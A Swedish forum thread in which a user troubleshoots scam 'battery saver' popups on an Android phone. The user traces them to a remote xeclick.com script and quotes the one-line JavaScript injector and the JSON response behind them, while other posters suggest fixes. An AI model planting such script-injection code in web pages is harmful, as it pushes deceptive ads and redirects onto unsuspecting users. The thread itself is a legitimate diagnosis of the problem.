Permalänk
Medlem

störig reklam i mobilen

Vet inte om problemet ligger i min mobil eller om det bara är en elak grej som smugit sig in på sidor med annonsfunktioner.

device: sony z3 compact android version 4.4.4

Problem: På många webbsidor när jag surfar så får jag upp en popup som säger "your phones battery discharges quickly? install this app, and extend your phones battery life by 8 hours..."
Väldigt störande att få den hela tiden, har testat diverse adware och antivirusprogram för att se om det finns något på min mobil men kan inte hitta något.
bild:(https://www.dropbox.com/s/mgi63ub2sbzko6h/Screenshot_2015-05-...)

Har nu börjat felsöka och genom lite pill i developer tools spårat vad det är som händer:
I grunden så är det ett javascript från http://xeclick.com som orsakar problemet
Den laddar in ett script som heter kKQQSqn3.js
som sen skickar ett anrop till http://xeclick.com/o/43204.json?uniq=true
och får tillbaka
id:"43204",
enabled:true,
redirect_url:"http://tracking.domobmedia.com/aff_c?aff_id=1788\u0026aff_sub...",
message:"Your phones battery discharges quickly? Install this app, and extend your phones battery life by 8 hours! Install now for free?",
img_url:null

Varifrån kommer då detta script?
Från något som heter 78kX som kör en : !function () { var d = document.createElement("script"); d.src = "http://xeclick.com/s/kKQQSqn3.js"; document.body.appendChild(d)}();
78kX kommer i sig från ga.js vilket är google tag manager för att läsa in diverse pixlar.

Utifrån den informationen så tror jag att det har med webbsidorna och något som smugit sig in i ga att göra, jag har även testat en annan webbläsare men det avhjälpte inte problemet.

Någon som har någon idé om hur jag ska gå vidare med detta? Har försökt hitta något sätt att spärra domänen xeclick.com men har inte hittat något.

Visa signatur

Fractal Design Node 304 -> ASUS ROG STRIX Z370-I GAMING ->i5 8600K -> be quiet! Pure Rock -> MSI GeForce RTX 4070 VENTUS 2X E 12G OC -> Corsair Vengeance LPX 3200 32GB -> Seasonic FOCUS Plus 650W Gold -> Samsung 960 EVO 500GB -> 2 * Western Digital Black 2 TB -> Samsung 850 EVO Basic SSD 500GB

Permalänk
Medlem

Är den rootad? Vad har du för appar installerade?

Permalänk
Medlem

@m4gnify: inte rootad.

Har inte speciellt många appar installerade och har tagit bort alla som jag installerat sen problemen började.
Har även avinstallerat alla spel och andra eventuella "konstiga" appar.

Visa signatur

Fractal Design Node 304 -> ASUS ROG STRIX Z370-I GAMING ->i5 8600K -> be quiet! Pure Rock -> MSI GeForce RTX 4070 VENTUS 2X E 12G OC -> Corsair Vengeance LPX 3200 32GB -> Seasonic FOCUS Plus 650W Gold -> Samsung 960 EVO 500GB -> 2 * Western Digital Black 2 TB -> Samsung 850 EVO Basic SSD 500GB

Permalänk
Medlem

@Verdurakh Säkerhetskopiera alla foton osv, och gör en fabriksåterställning. Har du ändå rensat ut allt kan du göra det också, det borde få bort skiten.

Permalänk
Medlem
Skrivet av Verdurakh:

@m4gnify: inte rootad.

Har inte speciellt många appar installerade och har tagit bort alla som jag installerat sen problemen började.
Har även avinstallerat alla spel och andra eventuella "konstiga" appar.

Vad är det för appar du har? Felet kommer med stor säkerhet från en av dem.

Visa signatur

Gamingrig | Intel Core i7-6700K @ 4.2 GHz | Nvidia GeForce GTX 980 Ti | ASUS ROG Maximus VIII Formula | 16GB 2133MHz HyperX DDR4 | SSD: Samsung 850 Pro 512GB + Intel 535 480GB + Samsung 840 Pro 256GB | HDD: 2x WD Black 2TB + 2x WD Green 4TB | Creative Sound Blaster ZxR+Sennheiser HD650 | Corsair RM1000 | Corsair H100i V2 | Phanteks P400S Tempered glass | Asus ROG Swift 1440p 165Hz + Asus 1440p PLS | Retina Macbook Pro | i7-3820QM | 8GB RAM | MS Surface Pro 3&4 | Intel i5 | 8GB RAM | 256GB SSD |

Permalänk
Medlem

roota och fixa adblock eller återställ telefonen efter sparning av allt viktigt. Eller ta bort skitappar

Visa signatur

| Fractal Design XL R2| 2x Gigabyte 680 Gtx@1254/7300mhz | Asrock Z77 OC Formula | 3570k@4.5ghz(1.36v) & Phanteks PH-TC14PE | 16gig hyperx beast series@2133mhz | Fractal Design Newton R2, 1000W 80+ | Samsung SSD Basic 840-Series 512GB | 2TB Toshiba 7200rpm SATA6 | 9x Scythe Glide Stream 2000rpm | 2x Bitfenix Recon Fan Controller | BenQ 27'' XL2720T 120Hz + Dell UltraSharp 27" U2713HM IPS 2560x1440 | Sennheiser HD595

Permalänk
Medlem
Skrivet av XFTality:

Vad är det för appar du har? Felet kommer med stor säkerhet från en av dem.

hmm
AVG antivirus, office suite, imdb, instagram, facebook messenger, alarmpad, bankid, battle.net mobile, google authenticator, swish, smart audiobook, google now, ds file, ds download, ds cloud, ds photo, dropbox, forex mobilbank,spotify, promillekoll, snapchat, var är bussen, länsförsäkringar, llama, timerecording, singstar, inbox, hemnet, avanza, västtrafik, bredbandskollen, chromecast, 9gag, sf bio, prisjakt, passwallet, klart.se,, runkeeper, ica, hearhstone, yatse, pressbyrån och Tink.

Alla dessa hade jag innan problemet började.

kan man spåra appars aktivitet på något sätt?

Kan ju iofs avinstallera alla appar en och en och se om det hjälper.

Visa signatur

Fractal Design Node 304 -> ASUS ROG STRIX Z370-I GAMING ->i5 8600K -> be quiet! Pure Rock -> MSI GeForce RTX 4070 VENTUS 2X E 12G OC -> Corsair Vengeance LPX 3200 32GB -> Seasonic FOCUS Plus 650W Gold -> Samsung 960 EVO 500GB -> 2 * Western Digital Black 2 TB -> Samsung 850 EVO Basic SSD 500GB

Permalänk
Medlem

Har fått samma skit på min lur ! har knappt några appar installerade. Var nyligen fabriksåterställd, säg till om du vet hur du lyckades lösa problemet.